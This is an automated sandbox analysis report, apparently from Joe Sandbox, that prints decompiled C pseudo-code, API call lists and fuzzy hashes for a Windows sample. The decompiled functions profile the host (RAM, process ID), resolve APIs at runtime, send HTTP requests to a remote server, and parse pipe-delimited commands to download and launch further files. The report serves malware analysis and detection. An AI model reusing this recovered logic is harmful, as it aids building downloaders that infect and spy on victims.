				_t56 = E0040C090(_a4, "|",  &_v1076);
				_t127 = _t126 + 0xc;
				_v1072 = _t56;
				_v8 = 1;
				E0040B720( &_v804, 0x104);
				E0040B720( &_v1068, 0x104);
				E0040B720( &_v540, 0x104);
				E0040B720( &_v276, 0x104);
				while(_v1072 != 0) {
					_v1140 = _v8;
					if(_v1140 == 1) {
						 *0x41aa24( &_v804, _v1072);
					} else {
						if(_v1140 == 2) {
							 *0x41aa24( &_v1068, _v1072);
							_t69 = E0040BF50( &_v1068, __eflags, 0x1a);
							_t117 =  *0x41a574; // 0x2e47018
							 *0x41aac8( &_v540, E0040BEB0( &_v1068, _t117, _t69));
							_t73 = E0040BF50( &_v540, __eflags, 0x1c);
							_t118 =  *0x41a518; // 0x2e46e50
							 *0x41aac8( &_v540, E0040BEB0( &_v540, _t118, _t73));
							_t77 = E0040BF50( &_v540, __eflags, 0x28);
							_t119 =  *0x41a2f8; // 0x2e47030
							 *0x41aac8( &_v540, E0040BEB0( &_v540, _t119, _t77));
							_t81 = E0040BF50( &_v540, __eflags, 0x10);
							_t120 =  *0x41a494; // 0x2e46e38
							_t83 = E0040BEB0( &_v540, _t120, _t81);
							_t127 = _t127 + 0x40;
							 *0x41aac8( &_v540, _t83);
						} else {
							if(_v1140 == 3) {
								 *0x41aa24( &_v276, _v1072);
								E004049E0( &_v540,  &_v804,  &_v540);
								_t127 = _t127 + 8;
								E0040B6E0( &_v540,  &_v1136, 0, 0x3c);
								_v1136 = 0x3c;
								_v1132 = 0;
								_v1128 = 0;
								_t110 =  *0x41a694; // 0x2e324c0
								_v1124 = _t110;
								_v1120 =  &_v540;
								_v1116 =  &_v276;
								_v1112 = 0;
								_v1108 = 5;
								_v1104 = 0;
								 *0x41aa84( &_v1136);
								E0040B6E0( &_v1136,  &_v1136, 0, 0x3c);
								E0040B720( &_v1068, 0x104);
								E0040B720( &_v540, 0x104);
								E0040B720( &_v276, 0x104);
								E0040B720( &_v804, 0x104);
								_v8 = 0;
							}
						}
					}
					_v8 = _v8 + 1;
					_t66 = E0040C090(0, "|",  &_v1076);
					_t127 = _t127 + 0xc;
					_v1072 = _t66;
				}
				return E0040B720( &_v1072, 4);
			}

0x00405b19
0x00405b1e
0x00405b21
0x00405b27
0x00405b3a
0x00405b4b
0x00405b5c
0x00405b6d
0x00405b72
0x00405b82
0x00405b8f
0x00405bba
0x00405b91
0x00405b98
0x00405bd3
0x00405bdb
0x00405be4
0x00405c02
0x00405c0a
0x00405c13
0x00405c31
0x00405c39
0x00405c42
0x00405c60
0x00405c68
0x00405c71
0x00405c7f
0x00405c84
0x00405c8f
0x00405b9a
0x00405ba1
0x00405ca8
0x00405cbc
0x00405cc1
0x00405ccf
0x00405cd4
0x00405cde
0x00405ce8
0x00405cf2
0x00405cf8
0x00405d04
0x00405d10
0x00405d16
0x00405d20
0x00405d2a
0x00405d3b
0x00405d4c
0x00405d5d
0x00405d6e
0x00405d7f
0x00405d90
0x00405d95
0x00405d95
0x00405ba1
0x00405b98
0x00405da2
0x00405db3
0x00405db8
0x00405dbb
0x00405dbb
0x00405dd7

APIs

lstrcat.KERNEL32(?,00000000), ref: 00405BBA
lstrcat.KERNEL32(?,00000000), ref: 00405BD3

Part of subcall function 0040BF50: SHGetFolderPathA.SHELL32(00000000,0040619E,00000000,00000000,?,?,000003E8), ref: 0040BF7B

Part of subcall function 0040BEB0: StrStrA.SHLWAPI(02E47018,?,?,004061B1,?,02E47018,00000000), ref: 0040BEBE

lstrcpy.KERNEL32(?,00000000), ref: 00405C02

Part of subcall function 0040BEB0: lstrcpyn.KERNEL32(0041AC88,02E47018,02E47018,?,004061B1,?,02E47018), ref: 0040BEE2
Part of subcall function 0040BEB0: wsprintfA.USER32 ref: 0040BF3B

lstrcpy.KERNEL32(?,00000000), ref: 00405C31
lstrcpy.KERNEL32(?,00000000), ref: 00405C60
lstrcpy.KERNEL32(?,00000000), ref: 00405C8F

Strings

<, xrefs: 00405CD4

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcpy$lstrcat$FolderPathlstrcpynwsprintf
String ID: <
API String ID: 2415926151-4251816714
Opcode ID: 747730083efd5928e2e27fe322c6f8ad2ed5ef5884fc777b8ac9b0fedd14d06d
Instruction ID: badc1f77fbd681f1876fa2e3389a3849b2e9868718c133fb1f617daaf3b8e41a
Opcode Fuzzy Hash: 747730083efd5928e2e27fe322c6f8ad2ed5ef5884fc777b8ac9b0fedd14d06d
Instruction Fuzzy Hash: D86114F190021CABD715EB60DC85FDE7378AB58304F0445AAF309A6191DB796B88CF9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040B000, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 45
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040B000() {
				void* _v8;
				int _v16;
				int _v20;
				struct _MEMORYSTATUSEX _v84;
				void* _t18;
				int _t27;

				_v8 = RtlAllocateHeap(GetProcessHeap(), 0, 0x104);
				_t18 = memset( &_v84, 0, 0x40);
				_v84.dwLength = 0x40;
				GlobalMemoryStatusEx( &_v84);
				if(_t18 != 1) {
					_v20 = 0;
					_v16 = 0;
				} else {
					_t27 = _v84.ullAvailPhys;
					_v20 = E00413940(_v84.ullTotalPhys, _t27, 0x100000, 0);
					_v16 = _t27;
				}
				_push(_v16);
				wsprintfA(_v8, "%d MB", _v20);
				return _v8;
			}

0x0040b01a
0x0040b025
0x0040b02b
0x0040b036
0x0040b03f
0x0040b05d
0x0040b064
0x0040b041
0x0040b048
0x0040b055
0x0040b058
0x0040b058
0x0040b06e
0x0040b07c
0x0040b08b

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040B00D
RtlAllocateHeap.NTDLL(00000000), ref: 0040B014
memset.NTDLL ref: 0040B025
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 0040B036
__aulldiv.LIBCMT ref: 0040B050
wsprintfA.USER32 ref: 0040B07C

Strings

%d MB, xrefs: 0040B073
@, xrefs: 0040B02B

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatus__aulldivmemsetwsprintf
String ID: %d MB$@
API String ID: 3391354518-3474575989
Opcode ID: fccb103469cb7bb388c409a6e7fed2ab2e9d3f73f783b03a8c0b01334b29ccb9
Instruction ID: d6dd67dfb3d0438e7a0ae41fe93027642831ff50444b6176823616896e2162a9
Opcode Fuzzy Hash: fccb103469cb7bb388c409a6e7fed2ab2e9d3f73f783b03a8c0b01334b29ccb9
Instruction Fuzzy Hash: 7F01A9B1D40208ABDB00DFE4DD49BEFB7B8FB48701F108559F615AB280D7B99A118B99

Uniqueness

Uniqueness Score: -1.00%

Function 02D268A0, Relevance: 13.7, APIs: 9, Instructions: 176stringCOMMON

Download Yara Rule

APIs

Part of subcall function 02D2BB00: GetSystemTime.KERNEL32(?,?,00000104), ref: 02D2BB21

lstrcat.KERNEL32(?,00000000), ref: 02D26909
lstrcat.KERNEL32(?,0041A260), ref: 02D2691D
lstrcat.KERNEL32(?,0041A368), ref: 02D26930
lstrcat.KERNEL32(?,0041A7C4), ref: 02D26944
lstrcat.KERNEL32(?,0041A76C), ref: 02D26958

Part of subcall function 02D253F0: InternetOpenA.WININET(0041401A,00000000,00000000,00000000,00000000), ref: 02D2541D
Part of subcall function 02D253F0: StrCmpCA.SHLWAPI(00000000,00418B90), ref: 02D25443
Part of subcall function 02D253F0: InternetSetOptionA.WININET(00000000,00000006,000927C0,00000004), ref: 02D2547D
Part of subcall function 02D253F0: InternetConnectA.WININET(00000000,?,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 02D254A3
Part of subcall function 02D253F0: HttpOpenRequestA.WININET(00000000,?,?,00000000,00000000,00000000,00C00100,00000000), ref: 02D25503
Part of subcall function 02D253F0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02D25577
Part of subcall function 02D253F0: HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 02D25593
Part of subcall function 02D253F0: StrCmpCA.SHLWAPI(?,00418B8C), ref: 02D255A9

lstrcat.KERNEL32(?,00000000), ref: 02D26988

Part of subcall function 02D26570: lstrcat.KERNEL32(?,?), ref: 02D265E4

Part of subcall function 02D24C30: InternetOpenA.WININET(0041401A,00000001,00000000,00000000,00000000), ref: 02D24C5E

Part of subcall function 02D2A950: GetProcessHeap.KERNEL32(00000000,000F423F,?,02D269FC,?,0041ABA4,0041ABAC,0041ABA8,?,00000104,?,00001388), ref: 02D2A95A
Part of subcall function 02D2A950: RtlAllocateHeap.NTDLL(00000000,?,02D269FC), ref: 02D2A961

Part of subcall function 02D25930: GetProcessHeap.KERNEL32(00000000,000F423F), ref: 02D2593B
Part of subcall function 02D25930: RtlAllocateHeap.NTDLL(00000000), ref: 02D25942
Part of subcall function 02D25930: lstrcat.KERNEL32(?,0041A6E4), ref: 02D25955
Part of subcall function 02D25930: lstrcat.KERNEL32(?,0041A22C), ref: 02D25966
Part of subcall function 02D25930: lstrcat.KERNEL32(?,00418BC0), ref: 02D25975
Part of subcall function 02D25930: lstrcat.KERNEL32(?,0041A6C4), ref: 02D25986
Part of subcall function 02D25930: lstrcat.KERNEL32(?,00418BC4), ref: 02D25995
Part of subcall function 02D25930: lstrcat.KERNEL32(?,0041A544), ref: 02D259A6
Part of subcall function 02D25930: lstrcat.KERNEL32(?,00418BC0), ref: 02D259B5
Part of subcall function 02D25930: lstrcat.KERNEL32(?,0041A79C), ref: 02D259C6
Part of subcall function 02D25930: GetCurrentProcessId.KERNEL32 ref: 02D259CC
Part of subcall function 02D25930: lstrcat.KERNEL32(?,00000000), ref: 02D259E0
Part of subcall function 02D25930: lstrcat.KERNEL32(?,00418BC0), ref: 02D259EF
Part of subcall function 02D25930: lstrcat.KERNEL32(?,0041A55C), ref: 02D259FF
Part of subcall function 02D25930: lstrcat.KERNEL32(?,00000000), ref: 02D25A0F
Part of subcall function 02D25930: lstrcat.KERNEL32(?,00418BC4), ref: 02D25A1E
Part of subcall function 02D25930: lstrcat.KERNEL32(?,0041A044), ref: 02D25A2F
Part of subcall function 02D25930: lstrcat.KERNEL32(?,00000000), ref: 02D25A3F
Part of subcall function 02D25930: lstrcat.KERNEL32(?,00418BC0), ref: 02D25A4E
Part of subcall function 02D25930: lstrcat.KERNEL32(?,0041A0FC), ref: 02D25A5F
Part of subcall function 02D25930: lstrcat.KERNEL32(?,00000000), ref: 02D25A6F
Part of subcall function 02D25930: lstrcat.KERNEL32(?,00418BC4), ref: 02D25A7E

lstrcat.KERNEL32(?,00000000), ref: 02D26A9E
SetCurrentDirectoryA.KERNEL32(0041A6A8,?,?,?,?,?,00001388,?,?,?,?,?,?,?,?,00000104), ref: 02D26AAB
lstrlen.KERNEL32(?,?,?,?,?,?,00001388,?,?,?,?,?,?,?,?,00000104), ref: 02D26AB8

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrcat$HeapInternet$HttpOpenProcess$AllocateCurrentRequest$ConnectDirectoryInfoOptionQuerySendSystemTimelstrlen
String ID:
API String ID: 2767677664-0
Opcode ID: 086d614e0f8ceeab508543bd7818011aace6c64de742493a2a319ccd1d6628aa
Instruction ID: 336bc477c53a7e51f94a346eb8f882fbb0f3366bc77d4a9898f7496ff1531564
Opcode Fuzzy Hash: 086d614e0f8ceeab508543bd7818011aace6c64de742493a2a319ccd1d6628aa
Instruction Fuzzy Hash: 406156F6901218ABC711E7A0DC48EDA73BDEB5C708F40C5A5F20993291DA74EA98CF75

Uniqueness

Uniqueness Score: -1.00%

Function 00406650, Relevance: 13.7, APIs: 9, Instructions: 176
stringCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406650(void* __ecx, void* __eflags) {
				char _v5004;
				char _v5268;
				char _v10268;
				char _v10272;
				char _v10276;
				char _v10540;
				char _v10544;
				intOrPtr _t46;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t61;
				intOrPtr _t71;
				void* _t76;
				intOrPtr _t90;
				intOrPtr _t92;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t101;
				intOrPtr _t107;
				intOrPtr _t109;
				intOrPtr _t111;
				intOrPtr _t112;
				intOrPtr _t116;
				CHAR* _t117;
				void* _t121;
				void* _t129;
				void* _t133;

				_t133 = __eflags;
				E004139B0(0x292c, __ecx);
				_v10544 = E00413730(0, 0x6400000, 0);
				E0040B720( &_v5268, 0x104);
				E0040B720( &_v10268, 0x1388);
				E0040B720( &_v10540, 0x104);
				 *0x41aa24( &_v5268, E0040B8B0( &_v10268, _t133, 0x10));
				_t90 =  *0x41a260; // 0x2e32510
				 *0x41aa24( &_v5268, _t90);
				_t46 =  *0x41a368; // 0x2e32480
				 *0x41aa24( &_v10540, _t46);
				_t107 =  *0x41a7c4; // 0x2e32f68
				 *0x41aa24( &_v10540, _t107);
				_t92 =  *0x41a76c; // 0x2e470a8
				 *0x41aa24( &_v10540, _t92);
				_t51 =  *0x41a714; // 0x2e49a88
				_t93 =  *0x41a288; // 0x2e46ec8
				_t109 =  *0x41a7c4; // 0x2e32f68
				_t52 =  *0x41a368; // 0x2e32480
				 *0x41aa24( &_v10268, E004051A0(_t93, _t133, _t52, _t109, _t93, _t51));
				E00406320( &_v10268, _t133,  &_v10268, _v10544);
				E0040B720( &_v10268, 0x1388);
				_t111 =  *0x41a6a4; // 0x2e493b0
				E004049E0( &_v10268,  &_v10540, _t111);
				E0040B720( &_v10540, 0x104);
				_t112 =  *0x41aba8; // 0x0
				_t61 =  *0x41abac; // 0x0
				_t97 =  *0x41aba4; // 0x0
				E0040A700(_t133, _v10544, _t97, _t61, _t112);
				E00401470(_v10544);
				E004056E0(_v10544, _t133, _v10544);
				_t129 = _t121 + 0x48;
				_t134 =  *0x41abb0;
				if( *0x41abb0 != 0) {
					E0040BCF0(_t134, 0x41, _v10544);
					_t129 = _t129 + 8;
				}
				E00413800(_v10544,  &_v10276,  &_v10272);
				E0040B720( &_v5004, 0x1388);
				_t101 =  *0x41a288; // 0x2e46ec8
				_t116 =  *0x41a7c4; // 0x2e32f68
				_t71 =  *0x41a368; // 0x2e32480
				 *0x41aa24( &_v5004, E00404BE0(_t101, _t134, _t71, _t116, _t101,  &_v5268, _v10276, _v10272));
				_t117 =  *0x41a6a8; // 0x2e4a420
				SetCurrentDirectoryA(_t117);
				_t76 =  *0x41a908( &_v5004);
				_t135 = _t76 - 5;
				if(_t76 > 5) {
					E00405B00(_t135,  &_v5004);
				}
				E0040B720( &_v5268, 0x104);
				E0040B720( &_v5004, 0x1388);
				E0040B720( &_v10276, 4);
				E0040B720( &_v10272, 4);
				E0040B720( &_v10544, 4);
				E00405DE0();
				 *0x41abb4 = 1;
				return 0;
			}

0x00406650
0x00406658
0x0040666e
0x00406680
0x00406691
0x004066a2
0x004066b9
0x004066bf
0x004066cd
0x004066d3
0x004066e0
0x004066e6
0x004066f4
0x004066fa
0x00406708
0x0040670e
0x00406714
0x0040671b
0x00406722
0x00406738
0x0040674c
0x00406760
0x00406765
0x00406773
0x00406787
0x0040678c
0x00406793
0x00406799
0x004067a7
0x004067b6
0x004067c5
0x004067ca
0x004067cd
0x004067d4
0x004067df
0x004067e4
0x004067e4
0x004067fc
0x00406810
0x0040682a
0x00406831
0x00406838
0x0040684e
0x00406854
0x0040685b
0x00406868
0x0040686e
0x00406871
0x0040687a
0x0040687f
0x0040688e
0x0040689f
0x004068ad
0x004068bb
0x004068c9
0x004068ce
0x004068d3
0x004068e2

APIs

Part of subcall function 0040B8B0: GetSystemTime.KERNEL32(?,?,00000104), ref: 0040B8D1

lstrcat.KERNEL32(?,00000000), ref: 004066B9
lstrcat.KERNEL32(?,02E32510), ref: 004066CD
lstrcat.KERNEL32(?,02E32480), ref: 004066E0
lstrcat.KERNEL32(?,02E32F68), ref: 004066F4
lstrcat.KERNEL32(?,02E470A8), ref: 00406708

Part of subcall function 004051A0: InternetOpenA.WININET(0041401A,00000000,00000000,00000000,00000000), ref: 004051CD
Part of subcall function 004051A0: StrCmpCA.SHLWAPI(00000000,https://), ref: 004051F3
Part of subcall function 004051A0: InternetSetOptionA.WININET(00000000,00000006,000927C0,00000004), ref: 0040522D
Part of subcall function 004051A0: InternetConnectA.WININET(00000000,02E32480,000001BB,00000000,00000000,00000003,00000000,00000000), ref: 00405253
Part of subcall function 004051A0: HttpOpenRequestA.WININET(00000000,?,0040672D,00000000,00000000,00000000,00C00100,00000000), ref: 004052B3
Part of subcall function 004051A0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00405327
Part of subcall function 004051A0: HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00405343
Part of subcall function 004051A0: StrCmpCA.SHLWAPI(?,200), ref: 00405359

lstrcat.KERNEL32(?,00000000), ref: 00406738

Part of subcall function 00406320: lstrcat.KERNEL32(?,?), ref: 00406394

Part of subcall function 004049E0: InternetOpenA.WININET(0041401A,00000001,00000000,00000000,00000000), ref: 00404A0E

Part of subcall function 0040A700: GetProcessHeap.KERNEL32(00000000,000F423F,?,004067AC,?,00000000,00000000,00000000,?,00000104,?,00001388), ref: 0040A70A
Part of subcall function 0040A700: RtlAllocateHeap.NTDLL(00000000,?,004067AC), ref: 0040A711

Part of subcall function 004056E0: GetProcessHeap.KERNEL32(00000000,000F423F,?,?,004067CA,?,?,?,?,?,00000104,?,00001388), ref: 004056EB
Part of subcall function 004056E0: RtlAllocateHeap.NTDLL(00000000,?,004067CA), ref: 004056F2
Part of subcall function 004056E0: lstrcat.KERNEL32(?,02E32520), ref: 00405705
Part of subcall function 004056E0: lstrcat.KERNEL32(?,02E32490), ref: 00405716
Part of subcall function 004056E0: lstrcat.KERNEL32(?,00418BC0), ref: 00405725
Part of subcall function 004056E0: lstrcat.KERNEL32(?,02E49AA8), ref: 00405736
Part of subcall function 004056E0: lstrcat.KERNEL32(?,00418BC4), ref: 00405745
Part of subcall function 004056E0: lstrcat.KERNEL32(?,02E331C8), ref: 00405756
Part of subcall function 004056E0: lstrcat.KERNEL32(?,00418BC0), ref: 00405765
Part of subcall function 004056E0: lstrcat.KERNEL32(?,02E46F70), ref: 00405776
Part of subcall function 004056E0: GetCurrentProcessId.KERNEL32(?,004067CA,?,?,?,?,?,00000104,?,00001388), ref: 0040577C
Part of subcall function 004056E0: lstrcat.KERNEL32(?,00000000), ref: 00405790
Part of subcall function 004056E0: lstrcat.KERNEL32(00418BC0,00418BC0), ref: 0040579F
Part of subcall function 004056E0: lstrcat.KERNEL32(02E47048,02E47048), ref: 004057AF
Part of subcall function 004056E0: lstrcat.KERNEL32(00000000,00000000), ref: 004057BF
Part of subcall function 004056E0: lstrcat.KERNEL32(00418BC4,00418BC4), ref: 004057CE
Part of subcall function 004056E0: lstrcat.KERNEL32(02E46F88,02E46F88), ref: 004057DF
Part of subcall function 004056E0: lstrcat.KERNEL32(00000000,00000000), ref: 004057EF
Part of subcall function 004056E0: lstrcat.KERNEL32(00418BC0,00418BC0), ref: 004057FE
Part of subcall function 004056E0: lstrcat.KERNEL32(02E32FA8,02E32FA8), ref: 0040580F
Part of subcall function 004056E0: lstrcat.KERNEL32(00000000,00000000), ref: 0040581F
Part of subcall function 004056E0: lstrcat.KERNEL32(00418BC4,00418BC4), ref: 0040582E

lstrcat.KERNEL32(?,00000000), ref: 0040684E
SetCurrentDirectoryA.KERNEL32(02E4A420,?,?,?,?,?,00001388,?,?,?,?,?,?,?,?,00000104), ref: 0040685B
lstrlen.KERNEL32(?,?,?,?,?,?,00001388,?,?,?,?,?,?,?,?,00000104), ref: 00406868

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: lstrcat$HeapInternet$HttpOpenProcess$AllocateCurrentRequest$ConnectDirectoryInfoOptionQuerySendSystemTimelstrlen
String ID:
API String ID: 2767677664-0
Opcode ID: fabbc2a9677d3c6aeca39df0d5bc9609c913b9ae446aed9ab3f1a9a909d992f7
Instruction ID: 4521fb7a1d59e918bbbcfb22c6a1b4b47e0d9ef7d9e5ed5fdd184795f43376b9
Opcode Fuzzy Hash: fabbc2a9677d3c6aeca39df0d5bc9609c913b9ae446aed9ab3f1a9a909d992f7
Instruction Fuzzy Hash: 476159B6901214ABD711EB60DC45DDA73BCEB4C744F00C5AAF209A3191DB78E794CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 02D2BF40, Relevance: 13.7, APIs: 9, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df366fe4cfdcb17f8835ee6a92eebfbb1b82b7e289318704104eb4b0eb4033a1
Instruction ID: 6f7009902614ea698ecea6862bb51cb99376bb68ef4371d53191fa4af8157f88
Opcode Fuzzy Hash: df366fe4cfdcb17f8835ee6a92eebfbb1b82b7e289318704104eb4b0eb4033a1
Instruction Fuzzy Hash: 525119B5A11208AFCB04EBE4DD84FEEB7B9AF4C704F108918F605E7290DB74A945CB65

Uniqueness

Uniqueness Score: -1.00%

Function 02D31770, Relevance: 13.6, APIs: 9, Instructions: 96stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,02D32CEA,?), ref: 02D31778
StrCmpCA.SHLWAPI(?,00419340,?,02D32CEA,?), ref: 02D317C5
StrCmpCA.SHLWAPI(?,00419344,?,02D32CEA,?), ref: 02D317DF
StrCmpCA.SHLWAPI(?,0041934C,?,02D32CEA,?), ref: 02D317F9

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: 430f65423b4f0def573a6f751fbc7bb6154696510ea6a2334855bcd8a57c314c
Instruction ID: 7e2e26d2ee339ca39244a1bed2772e7211f8ac75109db7a773e45cc6adb42b69
Opcode Fuzzy Hash: 430f65423b4f0def573a6f751fbc7bb6154696510ea6a2334855bcd8a57c314c
Instruction Fuzzy Hash: 9E318D79B0420AFBCB01DFB1DD84AEE7BB8AE097407248165F91A9B740D734DE40EB58

Uniqueness

Uniqueness Score: -1.00%

Function 02D272B0, Relevance: 13.6, APIs: 9, Instructions: 61libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(0041A6A4,?,02D2A971,?,02D269FC,?,0041ABA4,0041ABAC,0041ABA8,?,00000104,?,00001388), ref: 02D272B9
GetProcAddress.KERNEL32(0041A82C,0041A4D0), ref: 02D272DF
GetProcAddress.KERNEL32(0041A82C,0041A0EC), ref: 02D272F7
GetProcAddress.KERNEL32(0041A82C,0041A43C), ref: 02D2730F
GetProcAddress.KERNEL32(0041A82C,0041A41C), ref: 02D27328
GetProcAddress.KERNEL32(0041A82C,0041A454), ref: 02D27340
GetProcAddress.KERNEL32(0041A82C,0041A684), ref: 02D27358
GetProcAddress.KERNEL32(0041A82C,0041A570), ref: 02D27371
GetProcAddress.KERNEL32(0041A82C,0041A6F8), ref: 02D27389

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 594726dc9d5095b157e22f132bae16ed91bae53f4790aeb2ce1616c6ce3a6a40
Instruction ID: a201366df75e89df2eb3d1b08facf9bcdd489a88177b4a5cbfab565a3107d973
Opcode Fuzzy Hash: 594726dc9d5095b157e22f132bae16ed91bae53f4790aeb2ce1616c6ce3a6a40
Instruction Fuzzy Hash: 20211EB5627200DFC344EBB8ED889B637E9B74C315701C539E505C3261D735A462CF6A

Uniqueness

Uniqueness Score: -1.00%

Function 00407060, Relevance: 13.6, APIs: 9, Instructions: 61
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407060() {
				CHAR* _t1;
				CHAR* _t5;
				struct HINSTANCE__* _t7;
				CHAR* _t10;
				struct HINSTANCE__* _t12;
				CHAR* _t15;
				CHAR* _t18;
				struct HINSTANCE__* _t19;
				CHAR* _t20;
				struct HINSTANCE__* _t21;
				CHAR* _t22;
				struct HINSTANCE__* _t23;
				struct HINSTANCE__* _t24;
				CHAR* _t25;
				struct HINSTANCE__* _t26;
				CHAR* _t27;
				struct HINSTANCE__* _t28;

				_t1 =  *0x41a6a4; // 0x2e493b0
				 *0x41a82c = LoadLibraryA(_t1);
				if( *0x41a82c == 0) {
					return 0;
				}
				_t18 =  *0x41a4d0; // 0x2e4a8b8
				_t24 =  *0x41a82c; // 0x0
				 *0x41a830 = GetProcAddress(_t24, _t18);
				_t5 =  *0x41a0ec; // 0x2e4af80
				_t19 =  *0x41a82c; // 0x0
				 *0x41a7e8 = GetProcAddress(_t19, _t5);
				_t25 =  *0x41a43c; // 0x2e4a8e8
				_t7 =  *0x41a82c; // 0x0
				 *0x41a804 = GetProcAddress(_t7, _t25);
				_t20 =  *0x41a41c; // 0x2e4b080
				_t26 =  *0x41a82c; // 0x0
				 *0x41a820 = GetProcAddress(_t26, _t20);
				_t10 =  *0x41a454; // 0x2e4b160
				_t21 =  *0x41a82c; // 0x0
				 *0x41a808 = GetProcAddress(_t21, _t10);
				_t27 =  *0x41a684; // 0x2e4a978
				_t12 =  *0x41a82c; // 0x0
				 *0x41a834 = GetProcAddress(_t12, _t27);
				_t22 =  *0x41a570; // 0x2e4aec0
				_t28 =  *0x41a82c; // 0x0
				 *0x41a810 = GetProcAddress(_t28, _t22);
				_t15 =  *0x41a6f8; // 0x2e4aee0
				_t23 =  *0x41a82c; // 0x0
				 *0x41a818 = GetProcAddress(_t23, _t15);
				return 1;
			}

0x00407063
0x0040706f
0x0040707b
0x00000000
0x0040714b
0x00407081
0x00407088
0x00407095
0x0040709a
0x004070a0
0x004070ad
0x004070b2
0x004070b9
0x004070c5
0x004070ca
0x004070d1
0x004070de
0x004070e3
0x004070e9
0x004070f6
0x004070fb
0x00407102
0x0040710e
0x00407113
0x0040711a
0x00407127
0x0040712c
0x00407132
0x0040713f
0x00000000

APIs

LoadLibraryA.KERNEL32(02E493B0,?,0040A721,?,004067AC,?,00000000,00000000,00000000,?,00000104,?,00001388), ref: 00407069
GetProcAddress.KERNEL32(00000000,02E4A8B8), ref: 0040708F
GetProcAddress.KERNEL32(00000000,02E4AF80), ref: 004070A7
GetProcAddress.KERNEL32(00000000,02E4A8E8), ref: 004070BF
GetProcAddress.KERNEL32(00000000,02E4B080), ref: 004070D8
GetProcAddress.KERNEL32(00000000,02E4B160), ref: 004070F0
GetProcAddress.KERNEL32(00000000,02E4A978), ref: 00407108
GetProcAddress.KERNEL32(00000000,02E4AEC0), ref: 00407121
GetProcAddress.KERNEL32(00000000,02E4AEE0), ref: 00407139

Memory Dump Source

Source File: 00000017.00000002.412367036.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.412493181.000000000042C000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_400000_EC9F.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 594726dc9d5095b157e22f132bae16ed91bae53f4790aeb2ce1616c6ce3a6a40
Instruction ID: 2672694bce1a196fb14c5d12644c19629fc0bc7f4ce699a9cda348cbaa83b162
Opcode Fuzzy Hash: 594726dc9d5095b157e22f132bae16ed91bae53f4790aeb2ce1616c6ce3a6a40
Instruction Fuzzy Hash: 64210DB56262009FC344EBB8ED889B637E9B74C315711C53AE505C3261D635A462CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 02D2B250, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 02D2B25D
RtlAllocateHeap.NTDLL(00000000), ref: 02D2B264
memset.NTDLL ref: 02D2B275
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 02D2B286
__aulldiv.LIBCMT ref: 02D2B2A0
wsprintfA.USER32 ref: 02D2B2CC

Strings

@, xrefs: 02D2B27B

Memory Dump Source

Source File: 00000017.00000002.412955259.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_2d20000_EC9F.jbxd

Similarity

API ID: Heap$AllocateGlobalMemoryProcessStatus__aulldivmemsetwsprintf
String ID: @
API String ID: 3391354518-2766056989
